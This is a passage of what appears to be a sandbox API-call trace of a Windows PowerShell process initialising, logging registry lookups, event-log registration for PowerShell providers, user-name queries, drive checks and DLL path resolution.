	[0779.141] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x378) returned 0x0
	[0779.141] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x0) returned 0x2
	[0779.141] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x39c) returned 0x0
	[0779.141] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x0) returned 0x2
	[0779.142] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x3a0) returned 0x0
	[0779.142] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x0) returned 0x2
	[0779.142] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x3a4) returned 0x0
	[0779.142] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x0) returned 0x2
	[0779.142] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x3a8) returned 0x0
	[0779.142] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x0) returned 0x2
	[0779.142] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x3ac) returned 0x0
	[0779.142] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x0) returned 0x2
	[0779.143] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x3b0) returned 0x0
	[0779.143] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x0) returned 0x2
	[0779.143] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x3b4) returned 0x0
	[0779.159] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x0) returned 0x2
	[0779.159] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x3b8) returned 0x0
	[0779.159] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x3bc) returned 0x0
	[0779.160] RegCloseKey (hKey=0x3bc) returned 0x0
	[0779.160] RegCloseKey (hKey=0x398) returned 0x0
	[0779.160] RegCloseKey (hKey=0x3b8) returned 0x0
	[0779.168] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b7d0008
	[0780.063] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8edc0*="WSMan", lpRawData=0x2f8eb30) returned 1
	[0780.068] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0780.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.068] CoTaskMemFree (pv=0x1b6e3570) 
	[0780.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.070] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4400
	[0780.070] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4400, nSize=0xed4a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4a8) returned 0x1
	[0780.071] CoTaskMemFree (pv=0x1b6f4400) 
	[0780.071] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0780.071] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed4e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4e8) returned 1
	[0780.071] CoTaskMemFree (pv=0x343ca0) 
	[0780.072] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f942f8*="Alias", lpRawData=0x2f94088) returned 1
	[0780.078] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0780.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.078] CoTaskMemFree (pv=0x1b6e3570) 
	[0780.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.081] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4400
	[0780.081] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4400, nSize=0xed4a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4a8) returned 0x1
	[0780.081] CoTaskMemFree (pv=0x1b6f4400) 
	[0780.081] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0780.081] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed4e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4e8) returned 1
	[0780.083] CoTaskMemFree (pv=0x343ca0) 
	[0780.084] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f998f0*="Environment", lpRawData=0x2f99680) returned 1
	[0780.091] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0780.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.091] CoTaskMemFree (pv=0x1b6e3570) 
	[0780.092] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0780.092] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0780.092] CoTaskMemFree (pv=0x1b6e3570) 
	[0780.092] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0780.092] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0780.092] CoTaskMemFree (pv=0x1b6e3570) 
	[0780.092] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xed050, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0780.093] SetErrorMode (uMode=0x1) returned 0x1
	[0780.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xed260 | out: lpFileInformation=0xed260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.093] SetErrorMode (uMode=0x1) returned 0x1
	[0780.094] GetLogicalDrives () returned 0x4
	[0780.095] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.096] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0780.096] SetErrorMode (uMode=0x1) returned 0x1
	[0780.100] CoTaskMemAlloc (cb=0x68) returned 0x39a730
	[0780.100] CoTaskMemAlloc (cb=0x68) returned 0x1b6d8f40
	[0780.100] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x39a730, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xed230, lpMaximumComponentLength=0xed22c, lpFileSystemFlags=0xed228, lpFileSystemNameBuffer=0x1b6d8f40, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xed230*=0x9c354b42, lpMaximumComponentLength=0xed22c*=0xff, lpFileSystemFlags=0xed228*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0780.101] CoTaskMemFree (pv=0x39a730) 
	[0780.101] CoTaskMemFree (pv=0x1b6d8f40) 
	[0780.101] SetErrorMode (uMode=0x1) returned 0x1
	[0780.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0780.102] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecf70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.102] SetErrorMode (uMode=0x1) returned 0x1
	[0780.102] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed1d0 | out: lpFileInformation=0xed1d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.102] SetErrorMode (uMode=0x1) returned 0x1
	[0780.102] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecf70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.103] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0780.103] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0780.104] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.104] SetErrorMode (uMode=0x1) returned 0x1
	[0780.104] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed000 | out: lpFileInformation=0xed000*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.104] SetErrorMode (uMode=0x1) returned 0x1
	[0780.104] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.104] SetErrorMode (uMode=0x1) returned 0x1
	[0780.105] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed000 | out: lpFileInformation=0xed000*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.105] SetErrorMode (uMode=0x1) returned 0x1
	[0780.105] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xece40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0780.105] SetErrorMode (uMode=0x1) returned 0x1
	[0780.105] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed0a0 | out: lpFileInformation=0xed0a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0780.105] SetErrorMode (uMode=0x1) returned 0x1
	[0780.105] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4400
	[0780.106] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4400, nSize=0xed4a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4a8) returned 0x1
	[0780.106] CoTaskMemFree (pv=0x1b6f4400) 
	[0780.106] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0780.106] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed4e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4e8) returned 1
	[0780.106] CoTaskMemFree (pv=0x343ca0) 
	[0780.107] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fa09e0*="FileSystem", lpRawData=0x2fa0770) returned 1
	[0780.129] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0780.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.129] CoTaskMemFree (pv=0x1b6e3570) 
	[0780.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.131] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4400
	[0780.131] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4400, nSize=0xed4a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4a8) returned 0x1
	[0785.172] CoTaskMemFree (pv=0x1b6f4400) 
	[0785.172] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0785.172] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed4e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4e8) returned 1
	[0785.172] CoTaskMemFree (pv=0x343ca0) 
	[0785.173] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dee270*="Function", lpRawData=0x2dee000) returned 1
	[0785.900] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0785.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.900] CoTaskMemFree (pv=0x1b6e3570) 
	[0785.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.875] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4400
	[0787.875] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4400, nSize=0xed4a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4a8) returned 0x1
	[0787.877] CoTaskMemFree (pv=0x1b6f4400) 
	[0787.877] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0787.877] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed4e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4e8) returned 1
	[0787.877] CoTaskMemFree (pv=0x343ca0) 
	[0787.878] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e20af0*="Registry", lpRawData=0x2e20880) returned 1
	[0788.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.990] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4400
	[0788.990] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4400, nSize=0xed4a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4a8) returned 0x1
	[0788.990] CoTaskMemFree (pv=0x1b6f4400) 
	[0788.990] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0788.991] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed4e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4e8) returned 1
	[0788.991] CoTaskMemFree (pv=0x343ca0) 
	[0788.991] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e25f08*="Variable", lpRawData=0x2e25c98) returned 1
	[0789.038] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0789.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.039] CoTaskMemFree (pv=0x1b6e3570) 
	[0789.041] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0789.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.042] CoTaskMemFree (pv=0x1b6e3570) 
	[0789.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0789.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0789.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0789.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0789.938] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4400
	[0789.938] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4400, nSize=0xed4a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4a8) returned 0x1
	[0789.939] CoTaskMemFree (pv=0x1b6f4400) 
	[0789.939] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
